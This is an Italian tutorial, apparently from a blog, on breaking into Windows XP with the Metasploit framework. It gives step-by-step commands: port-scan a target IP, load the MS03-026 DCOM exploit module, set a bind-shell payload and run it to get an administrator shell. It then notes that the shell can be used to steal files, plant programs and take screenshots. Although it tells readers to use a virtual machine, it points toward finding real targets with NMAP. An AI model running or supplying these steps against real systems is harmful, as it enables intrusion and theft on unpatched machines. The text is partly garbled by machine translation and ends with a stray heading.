Come hackerare Windows XP – Windows XP è un vecchio sistema operativo. In effetti, Microsoft ha smesso di rilasciare aggiornamenti per questo sistema operativo. Tuttavia, molte persone stanno ancora utilizzando XP sui loro computer. Poiché questo sistema operativo non riceverà aggiornamenti futuri, le sue vulnerabilità esistenti saranno sempre disponibili per hacker e penetration tester.
Questa sezione ti insegnerà come attaccare Windows XP usando il framework Metasploit. L’autore presuppone che si sta utilizzando Kali Linux e che si dispone di una macchina virtuale che esegue Windows XP. Le macchine virtuali consentono di eseguire più sistemi operativi (in questo caso, Kali Linux e Windows XP) su un singolo computer. Ci sono un sacco di materiali didattici per quanto riguarda le macchine virtuali su YouTube.
Assicurarsi di utilizzare una macchina virtuale. Praticare questa tecnica di hacking su un vero computer Windows XP può portare a seri problemi. Se succede qualcosa di brutto su una macchina virtuale, puoi semplicemente riavviarlo premendo alcuni pulsanti. Busting un computer XP reale, d’altra parte, può portare a costi di riparazione.
Come hackerare Windows XP
Devi entrare in una rete prima di hackerare i computer ad essa collegati. Tuttavia, questa lezione non richiede alcun attacco di rete. Questo perché il sistema operativo XP è installato nel tuo computer Kali. Pertanto, la macchina virtuale XP appartiene alla rete del computer.
Per hackerare un computer Windows XP, dovresti:
- Avvia il framework Metasploit nel tuo sistema operativo Kali Linux.
Avvia un terminale e digita:
service postgresql start
Questo comando attiva PostgreSQL sul tuo computer. PostgreSQL funge da database di Metasploit, quindi è necessario eseguirlo prima di attivare il programma stesso. Ora, digitare:
service metasploit start
O
msfconsole
Se hai fatto tutto bene, il tuo terminale dovrebbe assomigliare a questo:
- Utilizzare la funzione” port scan ” di Metasploit per trovare gli obiettivi.
Il framework Metasploit è dotato di vari strumenti ausiliari. Port Scan è uno dei migliori strumenti presenti in questo quadro. Questo strumento consente di eseguire la scansione di tutte le porte di una macchina. E ‘ in grado di fornire informazioni dettagliate sulle porte aperte del vostro obiettivo. Come sapete, una porta funge da porta per gli hacker. Una porta aperta è una porta aperta.
Attivare la scansione delle porte immettendo questo comando:
use auxiliary/scanner/portscan/tcp
Visualizzare le opzioni di scansione disponibili digitando:
show options
Per impostazione predefinita, Port Scan controllerà ogni porta presente nel sistema. Non vuoi che ciò accada poiché l’intero processo richiederà molto tempo. Sarebbe meglio se specifichi l’intervallo di porte da controllare. Ecco un esempio:
set ports 1-600
Ora, è necessario specificare l’indirizzo IP della destinazione. Questo passaggio è complicato poiché gli indirizzi IP possono variare. Per questo esempio, è necessario accedere alla macchina virtuale XP e avviare un prompt dei comandi. Digitare “ipconfig” e cercare l’indirizzo IP della macchina. Supponiamo che l’indirizzo IP della tua macchina virtuale sia 192.168.62.122.
Torna al tuo sistema operativo Kali e inserisci quanto segue:
set RHOSTS 192.168.62.122
Digitare “esegui” per iniziare il processo. Metasploit visualizzerà tutte le porte aperte presenti nella macchina virtuale. Se la scansione non ha mostrato alcuna porta aperta, tornare al sistema operativo XP e disattivare il firewall. Quindi, eseguire nuovamente la scansione. Supponiamo che la scansione abbia scoperto due porte aperte: 135 e 445.
In pratica, non conoscerai l’indirizzo IP del tuo target. Ciò significa che è necessario utilizzare NMAP per trovare gli obiettivi e i loro indirizzi IP.
- Cerca exploit.
Questa è una delle fasi più importanti dell’attacco. È necessario trovare un exploit che funziona sul bersaglio scelto. Uscire dallo scanner della porta digitando “indietro”. Nella schermata principale di msfconsole, digitare “cerca dcom”. L’exploit” dcom ” è uno dei migliori strumenti che possono utilizzare per hackerare un computer XP.
Metasploit ti mostrerà i risultati della ricerca. Cerca il modulo chiamato “exploit/windows/dcerpc / ms03_026_dcom” e copia il suo nome. Quindi, digitare quanto segue:
use exploit/windows/dcerpc/ms03_026_dcom
Visualizzare le opzioni disponibili digitando:
show options
Indicare l’indirizzo IP del target. Ecco il codice:
set RHOST 192.168.62.122
Scegli il carico utile per il tuo attacco. Il carico utile determina cosa accadrà una volta che hai violato le difese del bersaglio. Può impostare un terminale aperto o piantare un virus. Ci sono migliaia di payload disponibili nel framework Metasploit. Per trovare il payload giusto per il tuo attacco attuale, digita:
payloads
- Il payload ideale per questa lezione è “windows / shell_bind_tcp”. Questo payload apre una shell (o prompt dei comandi) nella destinazione tramite una porta TCP. È possibile impostare questo payload digitando:
set PAYLOAD windows/shell_bind_tcp
- Ora che hai specificato ogni aspetto dell’attacco, digita “esegui”.
Metasploit ti dirà che una shell è stata aperta nel tuo computer di destinazione. Quella shell ti dà i privilegi di amministratore sul tuo target. È possibile scaricare file da quel computer o inviare programmi ad esso. È inoltre possibile ottenere screenshot del computer, se si desidera.
Come hackerare il metodo Getastra di Windows Xp